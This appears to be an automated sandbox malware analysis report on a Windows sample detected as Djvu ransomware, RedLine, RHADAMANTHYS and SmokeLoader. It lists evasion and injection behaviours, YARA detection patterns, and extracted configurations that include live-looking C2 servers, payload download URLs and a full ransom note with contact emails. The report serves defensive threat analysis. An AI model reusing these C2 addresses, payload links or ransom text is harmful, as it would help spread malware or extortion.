Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:	file.exe
Analysis ID:	791287
MD5:	6def34b7d9603c4fc7953f177f73c21a
SHA1:	82d464aedae69e9fa5ad521ceed3840595f3ad2f
SHA256:	277e1518b909735b16f393b7077e453735eb4d2dd651891f9f73da605941493b
Tags:	exe
Infos:

Detection

Djvu, RHADAMANTHYS, RedLine, SmokeLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected RedLine Stealer

Detected unpacking (overwrites its own PE header)

Yara detected AntiVM3

Yara detected SmokeLoader

System process connects to network (likely due to code injection or exploit)

Detected unpacking (changes PE section rights)

Antivirus detection for URL or domain

Yara detected RHADAMANTHYS Stealer

Benign windows process drops PE files

Malicious sample detected (through community Yara rule)

Yara detected Djvu Ransomware

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Maps a DLL or memory area into another process

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Machine Learning detection for sample

Allocates memory in foreign processes

Injects a PE file into a foreign processes

Deletes itself after installation

Creates a thread in another existing process (thread injection)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Checks if the current machine is a virtual machine (disk enumeration)

Hides threads from debuggers

Writes to foreign memory regions

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Found evasive API chain (date check)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Found evasive API chain (may stop execution after checking a module file name)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to dynamically determine API calls

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops files with a non-matching file extension (content does not match file extension)

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Yara detected Keylogger Generic

Dropped file seen in connection with other malware

Creates a process in suspended mode (likely to inject code)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Contains functionality for read data from the clipboard

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Contains functionality to call native functions

Contains functionality to read the clipboard data

Found dropped PE file which has not been started or loaded

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Creates a DirectInput object (often for capturing keystrokes)

Installs a raw input device (often for capturing keystrokes)

Allocates memory with a write watch (potentially for evading sandboxes)

Detected TCP or UDP traffic on non-standard ports

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Classification

Process Tree

System is w10x64

file.exe (PID: 1032 cmdline: C:\Users\user\Desktop\file.exe MD5: 6DEF34B7D9603C4FC7953F177F73C21A)

explorer.exe (PID: 3528 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

C676.exe (PID: 4620 cmdline: C:\Users\user\AppData\Local\Temp\C676.exe MD5: 261B1DB94CCF4266128E2EB71A80FDA4)

43D0.exe (PID: 1332 cmdline: C:\Users\user\AppData\Local\Temp\43D0.exe MD5: 0A006808F7AA017CAF2DF9CE9E2B55A2)

43D0.exe (PID: 3900 cmdline: C:\Users\user\AppData\Local\Temp\43D0.exe MD5: 0A006808F7AA017CAF2DF9CE9E2B55A2)

C4AA.exe (PID: 4116 cmdline: C:\Users\user\AppData\Local\Temp\C4AA.exe MD5: EA25CE2F3580AF1DD771BAC5B0D2BF83)

ngentask.exe (PID: 400 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe MD5: ED7F195F7121781CC3D380942765B57D)

ngentask.exe (PID: 4292 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe MD5: ED7F195F7121781CC3D380942765B57D)

fontview.exe (PID: 4772 cmdline: C:\Windows\SYSWOW64\fontview.exe MD5: 218D53564FB0DD0CAFBBF871641E70F7)

beirutt (PID: 2236 cmdline: C:\Users\user\AppData\Roaming\beirutt MD5: 6DEF34B7D9603C4FC7953F177F73C21A)

cleanup

Malware Configuration

Threatname: Djvu

{"Download URLs": ["http://uaery.top/dl/build2.exe", "http://drampik.com/files/1/build3.exe"], "C2 url": "http://drampik.com/lancer/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-cud8EGMtyB\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0637JOsie", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Windows\\", "F:\\PerfLogs\\", "F:\\ProgramData\\Desktop\\", "F:\\ProgramData\\Microsoft\\", "F:\\Users\\Public\\", "F:\\$Recycle.Bin\\", "F:\\$WINDOWS.~BT\\", "F:\\dell\\", "F:\\Intel\\"], "Public Key": "-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu01T\\/gszGuz7iKnpiRXv\\\\nGwWvl\\/ZhD6D24AJOT+SbHfvz6LGasPMGyfXmLe6Fo7e0cUtl3OwZeuwDkg4lB4eE\\\\nFp6tv8RPx3NAGJjylTPy7ZhLTxEuSD0YIP62Rs6Cek+fvfF53PxiGJhQuIxfvAVe\\\\nsFSNJ1+fNU92+JI5SRY0ZJdMezrQYJC7YY0onlwpLsiPbN5Osc6Jw2oabAVAS6rn\\\\nwQkW0GgIFh9e9trQc9Rdc5bf9X3s95J0jKg0TaTVFdw6RECS2cvRD1tZwc196EJ1\\\\nc5nBmBlLFWZqwkzVp4AORRnGGqz\\/OUTXiUmgNX+umpwUvdthK+7o1zc87nS20aU+\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----"}

Threatname: RedLine

{"C2 url": ["89.208.103.88:37538"], "Bot Id": "birj proliv", "Authorization Header": "9941068ef2768ed5ba54fc3eed22d795"}

Threatname: SmokeLoader

{"C2 list": ["http://bulimu55t.net/", "http://soryytlic4.net/", "http://bukubuka1.net/", "http://novanosa5org.org/", "http://hujukui3.net/", "http://newzelannd66.org/", "http://golilopaster.org/"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.397037744.00000000005F1000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.397037744.00000000005F1000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x3d4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.397025095.00000000005D0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.397025095.00000000005D0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x7d4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000008.00000002.478433039.00000000048E8000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000000C.00000002.572420134.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000000.00000002.397101149.00000000007A9000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x702e:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000009.00000003.485078968.000000000DF30000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000009.00000003.485078968.000000000DF30000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1a468:$pat14: , CommandLine: 0x134a1:$v2_1: ListOfProcesses 0x13280:$v4_3: base64str 0x13e03:$v4_4: stringKey 0x11b63:$v4_5: BytesToStringConverted 0x10d76:$v4_6: FromBase64 0x12098:$v4_8: procName 0x12813:$v5_5: FileScanning 0x11d6c:$v5_7: RecordHeaderField 0x11a34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
00000000.00000002.397013971.00000000005C0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
0000000D.00000003.510365391.0000000003056000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0000000D.00000003.510365391.0000000003056000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000A.00000002.481185705.0000000000400000.00000040.00000400.00020000.00000000.sdmp	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
0000000A.00000002.481185705.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
0000000A.00000002.481185705.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
0000000A.00000002.481185705.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000006.00000002.574270691.00000000006A8000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1320:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000009.00000003.490022034.000000000DF32000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000D.00000003.516786735.0000000004F75000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0000000D.00000002.573423971.0000000004AD0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0000000D.00000002.573423971.0000000004AD0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000009.00000002.573780441.000000000128B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000C.00000002.581410374.00000000033E6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000006.00000002.573778926.0000000000580000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000008.00000002.479914181.0000000004980000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000008.00000002.479914181.0000000004980000.00000040.00001000.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105ac8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xe38f:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
Process Memory Space: 43D0.exe PID: 1332	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: 43D0.exe PID: 1332	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x4af87:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: 43D0.exe PID: 3900	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: 43D0.exe PID: 3900	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x33041:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: ngentask.exe PID: 4292	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: fontview.exe PID: 4772	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Click to see the 27 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
9.3.C4AA.exe.df30000.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
9.3.C4AA.exe.df30000.1.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1a468:$pat14: , CommandLine: 0x134a1:$v2_1: ListOfProcesses 0x13280:$v4_3: base64str 0x13e03:$v4_4: stringKey 0x11b63:$v4_5: BytesToStringConverted 0x10d76:$v4_6: FromBase64 0x12098:$v4_8: procName 0x12813:$v5_5: FileScanning 0x11d6c:$v5_7: RecordHeaderField 0x11a34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
9.3.C4AA.exe.df30000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
9.3.C4AA.exe.df30000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1a468:$pat14: , CommandLine: 0x134a1:$v2_1: ListOfProcesses 0x13280:$v4_3: base64str 0x13e03:$v4_4: stringKey 0x11b63:$v4_5: BytesToStringConverted 0x10d76:$v4_6: FromBase64 0x12098:$v4_8: procName 0x12813:$v5_5: FileScanning 0x11d6c:$v5_7: RecordHeaderField 0x11a34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
9.2.C4AA.exe.12a0ed0.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
9.2.C4AA.exe.12a0ed0.1.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x18868:$pat14: , CommandLine: 0x118a1:$v2_1: ListOfProcesses 0x11680:$v4_3: base64str 0x12203:$v4_4: stringKey 0xff63:$v4_5: BytesToStringConverted 0xf176:$v4_6: FromBase64 0x10498:$v4_8: procName 0x10c13:$v5_5: FileScanning 0x1016c:$v5_7: RecordHeaderField 0xfe34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
9.3.C4AA.exe.df30000.0.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
9.3.C4AA.exe.df30000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1a468:$pat14: , CommandLine: 0x134a1:$v2_1: ListOfProcesses 0x13280:$v4_3: base64str 0x13e03:$v4_4: stringKey 0x11b63:$v4_5: BytesToStringConverted 0x10d76:$v4_6: FromBase64 0x12098:$v4_8: procName 0x12813:$v5_5: FileScanning 0x11d6c:$v5_7: RecordHeaderField 0x11a34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
12.2.ngentask.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
12.2.ngentask.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1a468:$pat14: , CommandLine: 0x134a1:$v2_1: ListOfProcesses 0x13280:$v4_3: base64str 0x13e03:$v4_4: stringKey 0x11b63:$v4_5: BytesToStringConverted 0x10d76:$v4_6: FromBase64 0x12098:$v4_8: procName 0x12813:$v5_5: FileScanning 0x11d6c:$v5_7: RecordHeaderField 0x11a34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
8.2.43D0.exe.49815a0.1.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xdf7ea:$s1: http:// 0xfd898:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xfdf28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xfdf4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101b2b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xffa26:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xdf7ea:$f1: http://
8.2.43D0.exe.49815a0.1.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
8.2.43D0.exe.49815a0.1.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfd288:$x1: C:\SystemID\PersonalID.txt 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfd6ec:$s1: " --AutoStart 0xfd700:$s1: " --AutoStart 0x101348:$s2: --ForNetRes 0x101310:$s3: --Admin 0x101790:$s4: %username% 0x1018b4:$s5: ?pid= 0x1018c0:$s6: &first=true 0x1018d8:$s6: &first=false 0xfd7f4:$s7: delself.bat 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
8.2.43D0.exe.49815a0.1.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x102f28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xc1ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
8.2.43D0.exe.49815a0.1.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
8.2.43D0.exe.49815a0.1.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
8.2.43D0.exe.49815a0.1.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
8.2.43D0.exe.49815a0.1.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
9.2.C4AA.exe.12a0ed0.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
9.2.C4AA.exe.12a0ed0.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x7a984:$s5: delete[] 0x1a468:$pat14: , CommandLine: 0x134a1:$v2_1: ListOfProcesses 0x13280:$v4_3: base64str 0x13e03:$v4_4: stringKey 0x11b63:$v4_5: BytesToStringConverted 0x10d76:$v4_6: FromBase64 0x12098:$v4_8: procName 0x12813:$v5_5: FileScanning 0x11d6c:$v5_7: RecordHeaderField 0x11a34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
10.2.43D0.exe.400000.0.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
10.2.43D0.exe.400000.0.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
10.2.43D0.exe.400000.0.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
10.2.43D0.exe.400000.0.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
10.2.43D0.exe.400000.0.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
10.2.43D0.exe.400000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
10.2.43D0.exe.400000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
10.2.43D0.exe.400000.0.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
Click to see the 23 entries

HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ryjphgb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 164Host: potunulit.org

Source: unknown

HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.4:49737 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 00000000.00000002.397037744.00000000005F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.397025095.00000000005D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: Yara match	File source: 0000000D.00000003.516786735.0000000004F75000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: fontview.exe PID: 4772, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\C676.exe

